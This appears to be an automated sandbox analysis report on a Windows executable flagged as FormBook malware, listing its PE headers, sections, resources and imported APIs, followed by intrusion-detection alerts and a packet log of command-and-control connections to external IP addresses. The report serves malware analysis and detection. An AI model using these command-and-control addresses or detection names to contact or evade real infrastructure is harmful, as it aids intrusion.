                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [ASM] VS2013 UPD5 build 40629
                            • [RES] VS2013 build 21005
                            • [LNK] VS2013 UPD5 build 40629
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x4f148.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1180000x7134.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0xc80000x4f1480x4f200c22b97e0fb966be1b36e9ad566967b81False0.917040012835703data7.869851604494583IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x1180000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                            RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                            RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                            RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                            RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                            RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                            RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                            RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                            RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                            RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                            RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                            RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                            RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                            RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                            RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                            RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                            RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                            RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                            RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                            RT_RCDATA0xd07b80x463e0data1.0003336670003338
                            RT_GROUP_ICON0x116b980x76dataEnglishGreat Britain0.6610169491525424
                            RT_GROUP_ICON0x116c100x14dataEnglishGreat Britain1.25
                            RT_GROUP_ICON0x116c240x14dataEnglishGreat Britain1.15
                            RT_GROUP_ICON0x116c380x14dataEnglishGreat Britain1.25
                            RT_VERSION0x116c4c0x10cdataEnglishGreat Britain0.5970149253731343
                            RT_MANIFEST0x116d580x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                            DLLImport
                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                            PSAPI.DLLGetProcessMemoryInfo
                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                            UxTheme.dllIsThemeActive
                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                            Language of compilation systemCountry where language is spokenMap
                            EnglishGreat Britain
                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            05/27/24-12:22:10.319360TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26319380192.168.2.7160.251.148.118
                            05/27/24-12:23:14.615156TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26320980192.168.2.73.33.130.190
                            05/27/24-12:21:56.331665TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26318980192.168.2.7203.161.43.227
                            05/27/24-12:21:29.439800TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26318180192.168.2.7199.59.243.225
                            05/27/24-12:22:24.036463TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26319780192.168.2.7199.59.243.225
                            05/27/24-12:23:42.952231TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26321780192.168.2.738.47.207.149
                            05/27/24-12:21:14.380304TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26317780192.168.2.7212.227.172.253
                            05/27/24-12:20:08.835239TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26316080192.168.2.7172.67.190.203
                            05/27/24-12:23:00.502659TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26320580192.168.2.7199.59.243.225
                            05/27/24-12:20:32.726865TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26316480192.168.2.7142.250.186.51
                            05/27/24-12:20:59.368425TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26317380192.168.2.7199.59.243.225
                            05/27/24-12:23:29.267343TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26321380192.168.2.791.195.240.92
                            05/27/24-12:20:46.049229TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26316980192.168.2.73.33.130.190
                            05/27/24-12:21:42.893457TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26318580192.168.2.7213.171.195.105
                            05/27/24-12:22:46.698255TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M26320180192.168.2.7185.31.240.240
                            TimestampSource PortDest PortSource IPDest IP
                            May 27, 2024 12:20:08.823646069 CEST6316080192.168.2.7172.67.190.203
                            May 27, 2024 12:20:08.830629110 CEST8063160172.67.190.203192.168.2.7
                            May 27, 2024 12:20:08.830764055 CEST6316080192.168.2.7172.67.190.203
                            May 27, 2024 12:20:08.835238934 CEST6316080192.168.2.7172.67.190.203
                            May 27, 2024 12:20:08.842257023 CEST8063160172.67.190.203192.168.2.7
                            May 27, 2024 12:20:09.468306065 CEST8063160172.67.190.203192.168.2.7
                            May 27, 2024 12:20:09.468329906 CEST8063160172.67.190.203192.168.2.7
                            May 27, 2024 12:20:09.468548059 CEST6316080192.168.2.7172.67.190.203
                            May 27, 2024 12:20:09.469002962 CEST8063160172.67.190.203192.168.2.7
                            May 27, 2024 12:20:09.469060898 CEST6316080192.168.2.7172.67.190.203
                            May 27, 2024 12:20:09.472043037 CEST6316080192.168.2.7172.67.190.203
                            May 27, 2024 12:20:09.476986885 CEST8063160172.67.190.203192.168.2.7
                            May 27, 2024 12:20:24.693749905 CEST6316180192.168.2.7142.250.186.51
                            May 27, 2024 12:20:24.698690891 CEST8063161142.250.186.51192.168.2.7
                            May 27, 2024 12:20:24.698853970 CEST6316180192.168.2.7142.250.186.51
                            May 27, 2024 12:20:24.700797081 CEST6316180192.168.2.7142.250.186.51
                            May 27, 2024 12:20:24.705835104 CEST8063161142.250.186.51192.168.2.7
                            May 27, 2024 12:20:25.357758999 CEST8063161142.250.186.51192.168.2.7
                            May 27, 2024 12:20:25.357909918 CEST8063161142.250.186.51192.168.2.7
                            May 27, 2024 12:20:25.357963085 CEST6316180192.168.2.7142.250.186.51
                            May 27, 2024 12:20:26.211209059 CEST6316180192.168.2.7142.250.186.51
                            May 27, 2024 12:20:27.233772039 CEST6316280192.168.2.7142.250.186.51
                            May 27, 2024 12:20:27.238892078 CEST8063162142.250.186.51192.168.2.7
                            May 27, 2024 12:20:27.238996983 CEST6316280192.168.2.7142.250.186.51
                            May 27, 2024 12:20:27.241489887 CEST6316280192.168.2.7142.250.186.51
                            May 27, 2024 12:20:27.246360064 CEST8063162142.250.186.51192.168.2.7
                            May 27, 2024 12:20:27.901139975 CEST8063162142.250.186.51192.168.2.7
                            May 27, 2024 12:20:27.901263952 CEST8063162142.250.186.51192.168.2.7
                            May 27, 2024 12:20:27.901323080 CEST6316280192.168.2.7142.250.186.51
                            May 27, 2024 12:20:28.757920027 CEST6316280192.168.2.7142.250.186.51
                            May 27, 2024 12:20:29.777017117 CEST6316380192.168.2.7142.250.186.51
                            May 27, 2024 12:20:29.782156944 CEST8063163142.250.186.51192.168.2.7
                            May 27, 2024 12:20:29.782390118 CEST6316380192.168.2.7142.250.186.51
                            May 27, 2024 12:20:29.784356117 CEST6316380192.168.2.7142.250.186.51
                            May 27, 2024 12:20:29.789297104 CEST8063163142.250.186.51192.168.2.7
                            May 27, 2024 12:20:29.789450884 CEST8063163142.250.186.51192.168.2.7
                            May 27, 2024 12:20:30.429518938 CEST8063163142.250.186.51192.168.2.7
                            May 27, 2024 12:20:30.430598021 CEST8063163142.250.186.51192.168.2.7
                            May 27, 2024 12:20:30.430704117 CEST6316380192.168.2.7142.250.186.51
                            May 27, 2024 12:20:31.710201979 CEST6316380192.168.2.7142.250.186.51
                            May 27, 2024 12:20:32.713980913 CEST6316480192.168.2.7142.250.186.51
                            May 27, 2024 12:20:32.719950914 CEST8063164142.250.186.51192.168.2.7
                            May 27, 2024 12:20:32.720161915 CEST6316480192.168.2.7142.250.186.51
                            May 27, 2024 12:20:32.726865053 CEST6316480192.168.2.7142.250.186.51
                            May 27, 2024 12:20:32.734935999 CEST8063164142.250.186.51192.168.2.7
                            May 27, 2024 12:20:33.376640081 CEST8063164142.250.186.51192.168.2.7
                            May 27, 2024 12:20:33.376822948 CEST8063164142.250.186.51192.168.2.7
                            May 27, 2024 12:20:33.377043009 CEST6316480192.168.2.7142.250.186.51
                            May 27, 2024 12:20:33.385878086 CEST6316480192.168.2.7142.250.186.51
                            May 27, 2024 12:20:33.400046110 CEST8063164142.250.186.51192.168.2.7
                            May 27, 2024 12:20:38.423935890 CEST6316680192.168.2.73.33.130.190
                            May 27, 2024 12:20:38.429065943 CEST80631663.33.130.190192.168.2.7
                            May 27, 2024 12:20:38.429174900 CEST6316680192.168.2.73.33.130.190
                            May 27, 2024 12:20:38.430928946 CEST6316680192.168.2.73.33.130.190
                            May 27, 2024 12:20:38.435863018 CEST80631663.33.130.190192.168.2.7
                            May 27, 2024 12:20:38.914235115 CEST80631663.33.130.190192.168.2.7
                            May 27, 2024 12:20:38.915884972 CEST6316680192.168.2.73.33.130.190
                            May 27, 2024 12:20:39.945612907 CEST6316680192.168.2.73.33.130.190
                            May 27, 2024 12:20:39.950639009 CEST80631663.33.130.190192.168.2.7
                            May 27, 2024 12:20:40.972160101 CEST6316780192.168.2.73.33.130.190
                            May 27, 2024 12:20:40.977252960 CEST80631673.33.130.190192.168.2.7
                            May 27, 2024 12:20:40.978652000 CEST6316780192.168.2.73.33.130.190
                            May 27, 2024 12:20:40.980408907 CEST6316780192.168.2.73.33.130.190
                            May 27, 2024 12:20:40.985405922 CEST80631673.33.130.190192.168.2.7
                            May 27, 2024 12:20:41.449824095 CEST80631673.33.130.190192.168.2.7
                            May 27, 2024 12:20:41.450001955 CEST6316780192.168.2.73.33.130.190
                            May 27, 2024 12:20:42.492374897 CEST6316780192.168.2.73.33.130.190
                            May 27, 2024 12:20:42.497514963 CEST80631673.33.130.190192.168.2.7
                            May 27, 2024 12:20:43.511022091 CEST6316880192.168.2.73.33.130.190
                            May 27, 2024 12:20:43.516285896 CEST80631683.33.130.190192.168.2.7
                            May 27, 2024 12:20:43.516540051 CEST6316880192.168.2.73.33.130.190
                            May 27, 2024 12:20:43.518188000 CEST6316880192.168.2.73.33.130.190
                            May 27, 2024 12:20:43.523241043 CEST80631683.33.130.190192.168.2.7
                            May 27, 2024 12:20:43.523252010 CEST80631683.33.130.190192.168.2.7
                            May 27, 2024 12:20:43.973032951 CEST80631683.33.130.190192.168.2.7
                            May 27, 2024 12:20:43.973249912 CEST6316880192.168.2.73.33.130.190
                            May 27, 2024 12:20:45.023741007 CEST6316880192.168.2.73.33.130.190
                            May 27, 2024 12:20:45.028719902 CEST80631683.33.130.190192.168.2.7
                            May 27, 2024 12:20:46.042295933 CEST6316980192.168.2.73.33.130.190
                            May 27, 2024 12:20:46.047503948 CEST80631693.33.130.190192.168.2.7
                            May 27, 2024 12:20:46.047596931 CEST6316980192.168.2.73.33.130.190
                            May 27, 2024 12:20:46.049228907 CEST6316980192.168.2.73.33.130.190
                            May 27, 2024 12:20:46.054205894 CEST80631693.33.130.190192.168.2.7
                            May 27, 2024 12:20:46.517323017 CEST80631693.33.130.190192.168.2.7
                            May 27, 2024 12:20:46.517523050 CEST80631693.33.130.190192.168.2.7
                            May 27, 2024 12:20:46.517708063 CEST6316980192.168.2.73.33.130.190
                            May 27, 2024 12:20:46.519928932 CEST6316980192.168.2.73.33.130.190
                            May 27, 2024 12:20:46.527966022 CEST80631693.33.130.190192.168.2.7
                            May 27, 2024 12:20:51.735249996 CEST6317080192.168.2.7199.59.243.225
                            May 27, 2024 12:20:51.742342949 CEST8063170199.59.243.225192.168.2.7
                            May 27, 2024 12:20:51.742428064 CEST6317080192.168.2.7199.59.243.225
                            May 27, 2024 12:20:51.746674061 CEST6317080192.168.2.7199.59.243.225
                            May 27, 2024 12:20:51.754067898 CEST8063170199.59.243.225192.168.2.7
                            May 27, 2024 12:20:52.199166059 CEST8063170199.59.243.225192.168.2.7
                            May 27, 2024 12:20:52.199194908 CEST8063170199.59.243.225192.168.2.7
                            May 27, 2024 12:20:52.199212074 CEST8063170199.59.243.225192.168.2.7
                            May 27, 2024 12:20:52.199285984 CEST6317080192.168.2.7199.59.243.225
                            May 27, 2024 12:20:52.199311018 CEST6317080192.168.2.7199.59.243.225
                            May 27, 2024 12:20:53.258178949 CEST6317080192.168.2.7199.59.243.225
                            May 27, 2024 12:20:54.276074886 CEST6317180192.168.2.7199.59.243.225
                            May 27, 2024 12:20:54.281166077 CEST8063171199.59.243.225192.168.2.7
                            May 27, 2024 12:20:54.281271935 CEST6317180192.168.2.7199.59.243.225
                            May 27, 2024 12:20:54.282757998 CEST6317180192.168.2.7199.59.243.225
                            May 27, 2024 12:20:54.287852049 CEST8063171199.59.243.225192.168.2.7
                            May 27, 2024 12:20:54.745572090 CEST8063171199.59.243.225192.168.2.7
                            May 27, 2024 12:20:54.745590925 CEST8063171199.59.243.225192.168.2.7
                            May 27, 2024 12:20:54.745651960 CEST8063171199.59.243.225192.168.2.7
                            May 27, 2024 12:20:54.745661020 CEST6317180192.168.2.7199.59.243.225
                            May 27, 2024 12:20:54.745687008 CEST6317180192.168.2.7199.59.243.225
                            May 27, 2024 12:20:55.789546967 CEST6317180192.168.2.7199.59.243.225
                            May 27, 2024 12:20:56.814440012 CEST6317280192.168.2.7199.59.243.225
                            May 27, 2024 12:20:56.820987940 CEST8063172199.59.243.225192.168.2.7
                            May 27, 2024 12:20:56.821122885 CEST6317280192.168.2.7199.59.243.225
                            May 27, 2024 12:20:56.822839975 CEST6317280192.168.2.7199.59.243.225
                            May 27, 2024 12:20:56.829314947 CEST8063172199.59.243.225192.168.2.7
                            May 27, 2024 12:20:56.829327106 CEST8063172199.59.243.225192.168.2.7
                            May 27, 2024 12:20:57.289233923 CEST8063172199.59.243.225192.168.2.7
                            May 27, 2024 12:20:57.289266109 CEST8063172199.59.243.225192.168.2.7
                            May 27, 2024 12:20:57.289285898 CEST8063172199.59.243.225192.168.2.7
                            May 27, 2024 12:20:57.289339066 CEST6317280192.168.2.7199.59.243.225
                            May 27, 2024 12:20:57.289397001 CEST6317280192.168.2.7199.59.243.225
                            May 27, 2024 12:20:58.336173058 CEST6317280192.168.2.7199.59.243.225
                            May 27, 2024 12:20:59.356446028 CEST6317380192.168.2.7199.59.243.225
                            May 27, 2024 12:20:59.365742922 CEST8063173199.59.243.225192.168.2.7
                            May 27, 2024 12:20:59.365902901 CEST6317380192.168.2.7199.59.243.225
                            May 27, 2024 12:20:59.368424892 CEST6317380192.168.2.7199.59.243.225
                            May 27, 2024 12:20:59.373306036 CEST8063173199.59.243.225192.168.2.7
                            May 27, 2024 12:20:59.824805021 CEST8063173199.59.243.225192.168.2.7
                            May 27, 2024 12:20:59.824830055 CEST8063173199.59.243.225192.168.2.7
                            May 27, 2024 12:20:59.824918985 CEST8063173199.59.243.225192.168.2.7
                            May 27, 2024 12:20:59.825139999 CEST6317380192.168.2.7199.59.243.225
                            May 27, 2024 12:20:59.825267076 CEST6317380192.168.2.7199.59.243.225
                            May 27, 2024 12:20:59.833990097 CEST6317380192.168.2.7199.59.243.225
                            May 27, 2024 12:20:59.838902950 CEST8063173199.59.243.225192.168.2.7
                            May 27, 2024 12:21:04.933269978 CEST6317480192.168.2.7212.227.172.253
                            May 27, 2024 12:21:04.938395023 CEST8063174212.227.172.253192.168.2.7
                            May 27, 2024 12:21:04.941972017 CEST6317480192.168.2.7212.227.172.253
                            May 27, 2024 12:21:04.958076954 CEST6317480192.168.2.7212.227.172.253
                            May 27, 2024 12:21:04.963047981 CEST8063174212.227.172.253192.168.2.7
                            May 27, 2024 12:21:05.581367016 CEST8063174212.227.172.253192.168.2.7
                            May 27, 2024 12:21:05.581413031 CEST8063174212.227.172.253192.168.2.7
                            May 27, 2024 12:21:05.581871986 CEST6317480192.168.2.7212.227.172.253
                            May 27, 2024 12:21:08.185463905 CEST6317480192.168.2.7212.227.172.253
                            May 27, 2024 12:21:09.199351072 CEST6317580192.168.2.7212.227.172.253
                            May 27, 2024 12:21:09.204411983 CEST8063175212.227.172.253192.168.2.7
                            May 27, 2024 12:21:09.204574108 CEST6317580192.168.2.7212.227.172.253
                            May 27, 2024 12:21:09.206199884 CEST6317580192.168.2.7212.227.172.253
                            May 27, 2024 12:21:09.211148977 CEST8063175212.227.172.253192.168.2.7
                            May 27, 2024 12:21:09.912512064 CEST8063175212.227.172.253192.168.2.7
                            May 27, 2024 12:21:09.912532091 CEST8063175212.227.172.253192.168.2.7
                            May 27, 2024 12:21:09.912570953 CEST8063175212.227.172.253192.168.2.7
                            May 27, 2024 12:21:09.912616968 CEST6317580192.168.2.7212.227.172.253
                            May 27, 2024 12:21:09.912616968 CEST6317580192.168.2.7212.227.172.253
